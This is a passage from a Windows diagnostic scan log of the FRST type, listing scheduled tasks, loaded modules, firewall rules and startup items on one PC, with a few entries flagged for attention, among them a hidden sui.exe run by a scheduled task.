Task: {70270BEE-6903-426F-8BEB-50960F1E983A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {7929F897-2D3D-48F8-8DCD-3739A872F66C} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [2018-06-03] (ASUSTeK Computer Inc.) <==== ATTENTION
Task: {811DF0C7-1098-48CA-93C5-55EAEFF494ED} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1409225181-4065645274-1912239689-1002 => C:\Users\cheat\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {8336B3A8-77EB-4D96-BCB2-9704A0EFB9CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {87BE6EAD-6FB2-4277-B781-320E9DD7AB52} - System32\Tasks\ASUS\USB 3.0 Boost Service => C:\Program Files (x86)\ASUS\AI Suite III\USB 3.0 Boost\U3BoostSvr.exe [2013-07-24] (ASUSTeK Computer Inc.)
Task: {88705292-B392-4729-8EAA-2B07A12AE1C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1409225181-4065645274-1912239689-1002UA => C:\Users\cheat\AppData\Local\Google\Update\GoogleUpdate.exe [2018-06-02] (Google Inc.)
Task: {9746FD2B-BEBD-40CA-88BE-9D4B847F4E28} - System32\Tasks\ASUS\Ez Update => C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe [2013-07-24] ()
Task: {AD7BE146-2930-49F3-A791-C19CD3B38486} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [2018-06-03] (ASUSTeK Computer Inc.) <==== ATTENTION
Task: {C02EB3F7-9B1A-47FD-8E57-A7B6977BA6DA} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-05-23] (NVIDIA Corporation)
Task: {C5EBC2A2-175E-4A54-87F9-19691072D722} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1409225181-4065645274-1912239689-1002Core => C:\Users\cheat\AppData\Local\Google\Update\GoogleUpdate.exe [2018-06-02] (Google Inc.)
Task: {C61FA227-35F6-438F-9D81-ECC058787AE0} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {CDE1FE21-DBC0-42C9-99AC-7EE286C6C28C} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-05-23] (NVIDIA Corporation)
Task: {CF5E0BE0-7F91-4824-9AB2-54041C037675} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {DE7F0752-2929-4C4A-B521-AC5C8FA2BB01} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {E86B56EE-F6EC-4395-8293-B50277B038CB} - System32\Tasks\Intel\Intel Telemetry 2 (x86) => C:\Program Files (x86)\Intel\Telemetry 2.0\lrio.exe [2016-03-17] (Intel Corporation)
Task: {EBF2DF24-8BEB-4E28-94AB-8F1BBEC379C4} - System32\Tasks\Menu => C:\Users\cheat\AppData\Roaming\sui.exe [2018-08-23] () <==== ATTENTION
Task: {F1CDB55E-7E19-485F-B103-346339E5E444} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {F9F0E69E-3633-4A1E-9752-5709E7AE8555} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2013-08-07] (ASUSTeK Computer Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Chrome Apps & Extensions Developer Tool.lnk -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=ohmmkhmmmpcnpikjeljgnaoabkaalbgc
ShortcutWithArgument: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Hudba Google Play.lnk -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=fahmaaghhglfmonjliepjlchgpgfmobi

==================== Loaded Modules (Whitelisted) ==============

2018-04-12 01:34 - 2018-04-12 01:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-08-19 18:19 - 2018-07-24 12:32 - 002681424 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-05-15 18:59 - 2018-05-15 18:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2018-05-15 18:58 - 2018-05-15 18:58 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 001314752 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2018-06-03 01:09 - 2015-08-20 12:41 - 001360016 _____ () C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe
2018-07-25 14:14 - 2018-07-14 05:56 - 000023040 _____ () C:\Windows\System32\hnsproxy.dll
2018-06-03 22:30 - 2018-06-03 22:28 - 000348136 _____ () C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe
2018-04-12 01:33 - 2018-04-12 01:33 - 000031744 _____ () C:\Windows\system32\HvSocket.dll
2018-04-25 16:49 - 2018-04-25 16:49 - 000282072 _____ () C:\Program Files (x86)\LightingService\AsRogAuraGpuDllServer.exe
2018-06-02 23:33 - 2013-07-24 10:16 - 001425208 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe
2018-06-02 23:34 - 2018-05-23 00:00 - 095437248 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2018-06-19 12:51 - 2018-06-19 12:51 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 003028928 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\swiftshader\libglesv2.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 000149440 _____ () C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\swiftshader\libegl.dll
2018-08-17 20:21 - 2018-08-23 21:18 - 296048640 __RSH () C:\Users\cheat\AppData\Roaming\sui.exe
2018-08-10 00:19 - 2018-08-08 02:41 - 004855640 _____ () C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\libglesv2.dll
2018-08-10 00:19 - 2018-08-08 02:41 - 000115544 _____ () C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\libegl.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000479232 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2018-08-22 14:11 - 2018-08-22 14:12 - 069280768 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 000049664 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 003699200 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\ImagePipelineNative.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000035328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\opencv_core320.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll
2018-06-02 23:33 - 2018-06-02 23:34 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 014335488 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 003544576 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 002870272 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2018-08-22 14:11 - 2018-08-22 14:12 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2018-07-26 20:09 - 2018-07-26 20:10 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-03-19 01:40 - 2018-03-19 01:40 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2018-04-12 01:34 - 2018-04-12 01:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 01:34 - 2018-04-12 01:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-08-24 21:08 - 2018-08-24 21:08 - 001676800 _____ () C:\Windows\IEcache.exe
2018-06-02 23:37 - 2017-12-26 21:26 - 000081368 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\ATKEX.dll
2018-06-02 23:37 - 2017-12-26 21:26 - 000229848 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\ASUS_WMI.dll
2018-06-02 23:37 - 2018-08-24 21:05 - 000038032 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\PEbiosinterface32.dll
2018-06-02 23:37 - 2017-12-26 21:26 - 000053248 _____ () C:\Program Files (x86)\ASUS\AXSP\4.00.01\cpuutil.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000114664 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\zlib1.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000108008 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_filesystem-vc120-mt-1_56.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000024040 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_system-vc120-mt-1_56.dll
2018-08-23 21:18 - 2018-07-09 14:20 - 000048104 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_date_time-vc120-mt-1_56.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000047576 _____ () C:\Program Files (x86)\LightingService\AuraHueWrapper.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 001777664 _____ () C:\Program Files (x86)\LightingService\Vender.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\ClaymoreProtocol.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\CharmProtocol.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000073728 _____ () C:\Program Files (x86)\LightingService\RogNewmouseProtocol.dll
2018-04-24 20:49 - 2018-04-24 20:49 - 000827904 _____ () C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.dll
2018-04-18 12:14 - 2018-04-18 12:14 - 000156672 _____ () C:\Program Files\Patriot\Aac_Patriot Viper RGB\AacHal_x86.dll
2018-04-26 15:48 - 2018-04-26 15:48 - 000236032 _____ () C:\Program Files\ASUS\CORSAIR_Aac_DRAM\AacCosairDramHal_x86.dll
2018-04-26 11:17 - 2018-04-26 11:17 - 000245248 _____ () C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 001951232 _____ () C:\Program Files (x86)\LightingService\R2Clib.dll
2018-04-18 15:11 - 2018-04-18 15:11 - 000053248 _____ () C:\Program Files (x86)\LightingService\cpuutil.dll
2018-06-02 23:33 - 2013-07-31 20:05 - 005773588 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzULIB.dll
2018-06-02 23:33 - 2010-06-21 15:21 - 000208896 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\ImageHelper.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2018-06-02 23:33 - 2013-08-08 14:41 - 002747392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2018-06-02 23:33 - 2013-08-29 15:59 - 001138176 _____ () C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EasyUpdt.dll
2018-06-02 23:33 - 2013-06-04 11:41 - 000662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000053248 _____ () C:\Program Files (x86)\ASUS\AI Suite III\cpuutil.dll
2018-06-02 23:33 - 2013-08-08 14:35 - 000010240 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\IccHelper.dll
2018-06-02 23:34 - 2012-01-19 09:39 - 000028672 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\PEInfo.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000208896 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ImageHelper.dll
2018-06-02 23:33 - 2013-08-07 19:11 - 000253952 _____ () C:\Program Files (x86)\ASUS\AI Suite III\pngio.dll
2018-06-02 23:34 - 2010-09-23 11:51 - 000114688 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\AsIdxParser.dll
2018-06-02 23:34 - 2010-02-25 14:01 - 000139264 _____ () C:\Program Files (x86)\ASUS\AI Suite III\USB BIOS Flashback\Aszip.dll
2017-11-27 18:10 - 2017-11-27 18:10 - 000065536 _____ () C:\Program Files (x86)\ASUS\GPU TweakII\Exeio.dll
2018-02-11 16:00 - 2018-02-11 16:00 - 001774592 _____ () C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
2018-06-02 23:34 - 2018-05-23 00:00 - 001032640 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2018-06-02 23:27 - 2018-06-08 23:38 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-06-02 23:27 - 2018-06-09 01:39 - 002632992 _____ () C:\Program Files (x86)\Steam\video.dll
2018-06-02 23:27 - 2018-06-08 23:42 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-06-02 23:27 - 2018-06-08 23:40 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-06-02 23:27 - 2018-06-09 01:38 - 000979744 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-06-02 23:27 - 2018-06-08 23:40 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-06-02 23:27 - 2018-06-08 23:42 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-06-02 23:27 - 2018-06-08 23:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2018-04-12 01:38 - 2018-04-12 01:36 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\cheat\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\2k-space-wallpapers-12.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\StartupApproved\Run: => "CyberGhost"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{6EA6C6FB-44C0-43DA-B375-5DB485D92F8B}C:\users\cheat\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\cheat\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{91D90389-D818-4ECF-AD63-813D657068E3}C:\users\cheat\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\cheat\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{B2FD56B7-75DD-45B6-A4B4-440E5F4B89D8}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BA9F7D1E-00D4-4760-9FB1-42601102538C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{49A1602E-41AB-494A-A1C7-DB815E45B5FA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B47F3184-FBE9-472D-98DB-17D3F2F817CE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{CFBEE400-65DB-4DBC-BB6B-0C9A6DC89EAB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F5DC4167-2AB2-4EF8-9807-3B52382BB4A6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{E0F25E19-3A13-42D2-9180-F38910D3D790}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9B634332-7B77-41DD-8617-FC959ABFB203}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{5F8579E8-97ED-44BD-9A9E-DEE9F9BD8247}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D9054139-C945-45A4-8BBB-8C3FA0BA1662}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{77C68027-1CE2-4230-B32A-192CA9BFF10C}C:\users\cheat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\cheat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{940AF356-5F3F-44B9-8353-928F7052C482}C:\users\cheat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\cheat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{6582BE93-8BBB-4350-B11D-CF8C10F641D1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [{A1B76B3A-4F75-4FC8-9806-CEDCB1409DCF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [TCP Query User{5EA7C50F-E22D-4DDA-A4D4-BA3A4C6C7574}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{C40BF5D2-6333-4DA8-9032-80D8C37D8D36}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [{7063CD98-6724-4533-94B9-4732C6793E41}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{A39570C8-F9AF-4D92-B39D-DFEFF6C92684}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [TCP Query User{11D9AFA6-91F5-4E89-8C21-0F3E46B4E229}C:\program files (x86)\diablo iii\x64\diablo iii64.exe] => (Allow) C:\program files (x86)\diablo iii\x64\diablo iii64.exe
FirewallRules: [UDP Query User{3EF255B9-7E5A-4577-B90C-31BB8ABF70B7}C:\program files (x86)\diablo iii\x64\diablo iii64.exe] => (Allow) C:\program files (x86)\diablo iii\x64\diablo iii64.exe
FirewallRules: [{6CFD3563-CCA8-4DC1-8915-FC3A3BC63005}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{D4F530BF-9A45-45DC-B556-25F5D7E2A404}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry Primal\bin\FCPrimal.exe
FirewallRules: [{F0F3FE5F-F74C-4EEC-9973-2832AC2F2481}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\FarCry4.exe
FirewallRules: [{979242D5-0BE1-402B-BEF9-550B507A815A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\FarCry4.exe
FirewallRules: [{CDA3A6E7-5520-4A8E-B1C0-F842D09EED71}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\IGE_WPF64.exe
FirewallRules: [{9E390100-578C-4088-B63B-0F83E609A0E7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Far Cry 4\bin\IGE_WPF64.exe
FirewallRules: [{A1EA035C-113A-42DF-85F8-BA6F303F9316}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{101C98E6-138D-433D-8A3D-B7CEA6CB8694}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [TCP Query User{C9EE8E06-653F-4894-A693-74F9788323D6}E:\games\battlefield 1\bf1.exe] => (Allow) E:\games\battlefield 1\bf1.exe
FirewallRules: [UDP Query User{72714654-C22A-4616-94BC-8909629A4F96}E:\games\battlefield 1\bf1.exe] => (Allow) E:\games\battlefield 1\bf1.exe
FirewallRules: [VIRT-MIGL-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [VIRT-REMOTEDESKTOP-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [{139C2629-6ABE-4039-A3A4-9EA1A54B02FE}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{EE1FF1B1-E227-48BD-8F13-D409E59BCCB2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{9FD565C4-2789-4962-AF35-0FECF03C66E8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\assettocorsa\AssettoCorsa.exe
FirewallRules: [{41E03DD8-0CED-4965-9648-859CC38790FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\assettocorsa\AssettoCorsa.exe
FirewallRules: [TCP Query User{48F34B00-4EDB-415E-AA72-D16C251DD07F}C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe
FirewallRules: [UDP Query User{B5861478-DF4C-4E23-B846-27621A9B75E1}C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\assettocorsa\acs.exe
FirewallRules: [{572EEA86-01A7-478C-A6A7-A8E58D31CFA3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{28E65332-4BAA-4DF8-ADFF-9A46FB3A8247}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{6061AD5C-74AA-49D8-A61C-09F3319CF4A7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [{7EE0478F-8F5D-442D-962A-8F0D6258B468}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crysis 2 Game of the Year\bin32\Crysis2Launcher.exe
FirewallRules: [TCP Query User{81B02A0B-EDB8-4B48-A893-3C76388D81A5}C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe
FirewallRules: [UDP Query User{7571F850-1A65-404F-B083-DD7996AF5D1D}C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\crysis 2 game of the year\bin32\crysis2.exe
FirewallRules: [{3D50543D-A20C-4317-A3BC-F1BA8419CEB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{1F751869-B3A3-404B-BE05-E340A60CD55F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [TCP Query User{912EC302-D039-49E6-A73B-30ABFCFCD383}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
